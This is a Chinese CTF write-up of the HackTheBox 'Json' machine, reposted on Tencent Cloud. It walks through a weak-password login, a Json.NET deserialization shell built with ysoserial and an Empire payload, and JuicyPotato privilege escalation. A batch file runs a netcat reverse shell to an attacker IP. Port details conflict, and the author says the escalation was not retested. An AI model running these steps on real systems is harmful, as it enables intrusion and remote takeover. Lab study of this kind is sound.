Hack the box-Json

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。

摘要

  • Json.net 反序列 getshell
  • JuicePotato 提权

信息收集

nmap 扫出了 22 , 80 端口

nmap -sC -sV -p- -T4 10.10.10.158Host is up (0.052s latency).Not shown: 65521 closed portsPORT      STATE SERVICE      VERSION21/tcp    open  ftp          FileZilla ftpd| ftp-syst:|_  SYST: UNIX emulated by FileZilla80/tcp    open  http         Microsoft IIS httpd 8.5| http-methods:|_  Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: Json HTB135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49154/tcp open  msrpc        Microsoft Windows RPC49156/tcp open  msrpc        Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    主页登录盲猜弱口令
admin:admin

进去管理系统没什么功能

   登录框抓包发现猫腻

改包为GET后发现bearer参数

   bearer参数是json类型
   把 json 参数打乱
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3",hello world}

Json.net反序列 getshell

发现json.net反序列

   利用 ysoserial.exe 进行参数注入getshell
   ysoserial.exe 配合 empire的powershell payload 获取shell
empire下操作:./empireuselistener httpset Host http://10.10.xx.xx:4444set Port 4444executebacklauncher powershell>>获得$$Empire payload$$
windows下操作:ysoserial.exe -g ObjectDataProvider -f json.net -c "$$Empire Payload$$" -o base64
    获取user.txt

Juice potato 提权

    检查windows版本
(empire:XXXXXXX)shell systeminfo | findstr WindowsOS Name:                   Microsoft Windows Server 2012 R2 Datacenter
    用户有 SeImpersonatePrivilege 权限
(empire:XXXXXXX)shell whoami /privPRIVILEGES INFORMATION----------------------
Privilege Name                Description                               State============================= ========================================= ========SeAssignPrimaryTokenPrivilege Replace a process level token             DisabledSeIncreaseQuotaPrivilege      Adjust memory quotas for a process        DisabledSeAuditPrivilege              Generate security audits                  DisabledSeChangeNotifyPrivilege       Bypass traverse checking                  EnabledSeImpersonatePrivilege        Impersonate a client after authentication EnabledSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    windows server 2019之前可以使用 juicypotato 提权工具
    依靠 SeImpersonatePrivilege 权限,我们应该可以提到 system 权限
nc -lvp 4444
(empire:XXXXXXX)cd \windows\temp(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\JuicyPotato.exe .(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\nc.exe .(empire:XXXXXXX)shell echo c:\windows\temp\nc.exe 10.10.xx.xx 4444 -e cmd.exe > start.bat(empire:XXXXXXX)shell JuicyPotato.exe -l 1337 -p C:\\windows\temp\start.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
    获取root.txt,提权过程没时间复现,思路是对的。           ****

本文分享自微信公众号 - Khan安全团队(KhanCJSH),作者:Khan安全团队

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-02-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 从信息收集到getshell

    灵感不就来了,那么初步判断有可能是dedecms尝试了几个dedecms的目录,均是not found

    Aran
  • Xctf攻防世界-Web基础题攻略

    攻防世界答题模块是一款提升个人信息安全水平的益智趣味答题,用户可任意选择题目类型进行答题。

    Aran
  • 泛微ecology OA系统配置文件泄露

    协作系统泛微e-cology OA被曝存在数据库配置信息泄露漏洞,如攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。

    Aran
  • 云监控最佳实践:自定义监控服务器 TIME_WAIT 连接数

    腾讯云服务器监控 agent 只采集了处于 ESTABLISHED 状态的 TCP 连接数量?

    腾讯云监控团队
  • 访问SAP C4C Business Configuration工作中心时遇到的错误信息

    当我试图访问Business configuration工作中心时,遇到下图的错误消息: You cannot access this project wit...

    Jerry Wang
  • 深入分析Android动画(二)

    上回书说到Android动画的分类以及基本使用,这会书主要说Android属性动画的原理,对于View动画的原理本篇不做深入分析。对于Android动画的基础请...

    mafeibiao
  • HTTP请求的11个处理阶段

    三杯水Plus
  • nginx的11个阶段概述

    // 将请求URI与location表达式匹配前,修改URI,即重定向阶段

    随心助手
  • 授时!GPS授时设备应用虎门大桥桥梁监测系统

    4月26日,武汉鹦鹉洲长江大桥桥体出现波浪般的晃动。此后,该桥管养单位武汉市城投集团公司回应称,此次桥梁异常振动系特定风况引起,振幅在设计允许范围内;桥梁结构运...

    NTP网络同步时钟
  • 公告 | 人工智能学术平台PaperWeekly正式创业,并获机器之心种子轮战略投资

    人工智能学术平台 PaperWeekly 正式创业并完成种子轮融资,机器之心对其进行了独家战略投资。 机器之心和 PaperWeekly 在内容方面合作已久,机...

    机器之心

扫码关注云+社区

领取腾讯云代金券